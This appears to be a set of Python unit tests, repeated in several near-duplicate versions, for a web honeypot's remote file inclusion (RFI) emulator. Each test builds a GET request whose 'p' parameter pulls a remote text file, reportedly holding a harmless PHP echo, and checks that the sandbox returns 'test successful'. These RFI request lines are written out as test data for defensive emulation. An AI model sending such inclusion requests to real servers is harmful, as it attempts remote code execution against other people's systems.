def test_rfi_emulator_with_malformed_uri(self): # TODO: Handle return value from sandbox """Objective: Remote File Injection test with malformed uri Input: http://localhost:8080/test.php?p="http://google.com/index.html Expected Result: The return value from the PHP sandbox. Notes: Injected file contains <?php echo("test successful"); ?>""" GlastopfHoneypot.prepare_sandbox(self.work_dir) print "Starting remote file inclusion test" event = attack.AttackEvent() event.http_request = HTTPHandler('GET /test.php?p=http://1durch0.de/test_file.txt HTTP/1.0', None) event.matched_pattern = "rfi" helpers.create_sandbox(self.data_dir) request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) print "Sending request:", "http://localhost:8080" + event.http_request.path emulator.handle(event) self.assertEqual(event.http_request.get_response(), "test successful") print "Return value 'test successful', matching our expectation."
def test_rfi_emulator(self): # TODO: Handle return value from sandbox """Objective: Remote File Injection test. Input: http://localhost:8080/test.php?p=http://google.com/index.html Expected Result: The return value from the PHP sandbox. Notes: Injected file contains <?php echo("test successful"); ?>""" GlastopfHoneypot.prepare_sandbox(self.work_dir) print "Starting remote file inclusion test" self.event.parsed_request = util.HTTPRequest() self.event.parsed_request.url = "/test.php?p=http://1durch0.de/test_file.txt" print "Sending request:", "http://localhost:8080" + self.event.parsed_request.url self.event.matched_pattern = "rfi" self.event.response = "" helpers.create_sandbox(self.data_dir) request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(self.event.matched_pattern) emulator.handle(self.event) self.assertEqual(self.event.response, "test successful") print "Return value 'test successful', matching our expectation."
def test_rfi_emulator_with_malformed_uri(self): # TODO: Handle return value from sandbox """Objective: Remote File Injection test with malformed uri Input: http://localhost:8080/test.php?p="http://google.com/index.html Expected Result: The return value from the PHP sandbox. Notes: Injected file contains <?php echo("test successful"); ?>""" GlastopfHoneypot.prepare_sandbox(self.work_dir) print "Starting remote file inclusion test" event = attack.AttackEvent() url = "https://gist.githubusercontent.com/glaslos/02c4c4be39fb03b3bbee5c862cd304c6/raw/adf146469e8eeee4498874164ecd80c70ffb4e7a/test_file.txt" event.http_request = HTTPHandler('GET /test.php?p={} HTTP/1.0'.format(url), None) event.matched_pattern = "rfi" helpers.create_sandbox(self.data_dir) request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) print "Sending request:", "http://localhost:8080" + event.http_request.path emulator.handle(event) self.assertEqual(event.http_request.get_response(), "test successful") print "Return value 'test successful', matching our expectation."
def test_rfi_emulator_with_malformed_uri(self): # TODO: Handle return value from sandbox """Objective: Remote File Injection test with malformed uri Input: http://localhost:8080/test.php?p="http://google.com/index.html Expected Result: The return value from the PHP sandbox. Notes: Injected file contains <?php echo("test successful"); ?>""" GlastopfHoneypot.prepare_sandbox(self.work_dir) print "Starting remote file inclusion test" event = attack.AttackEvent() url = "https://gist.githubusercontent.com/glaslos/02c4c4be39fb03b3bbee5c862cd304c6/raw/adf146469e8eeee4498874164ecd80c70ffb4e7a/test_file.txt" event.http_request = HTTPHandler( 'GET /test.php?p={} HTTP/1.0'.format(url), None) event.matched_pattern = "rfi" helpers.create_sandbox(self.data_dir) request_handler = RequestHandler(self.data_dir) emulator = request_handler.get_handler(event.matched_pattern) print "Sending request:", "http://localhost:8080" + event.http_request.path emulator.handle(event) self.assertEqual(event.http_request.get_response(), "test successful") print "Return value 'test successful', matching our expectation."